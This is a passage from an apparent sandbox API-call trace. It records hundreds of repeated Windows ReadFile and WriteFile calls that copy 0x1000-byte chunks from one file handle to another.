lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.930] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.930] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.930] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.931] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.931] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.931] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.931] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.932] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.933] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.934] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.934] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.935] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.935] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.936] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.937] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.938] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.939] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.940] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.941] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.942] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.943] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.943] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.943] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.943] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.943] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.053] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.072] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.072] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.072] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.072] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.072] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.073] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.073] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.073] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.073] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.073] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.073] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.073] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, 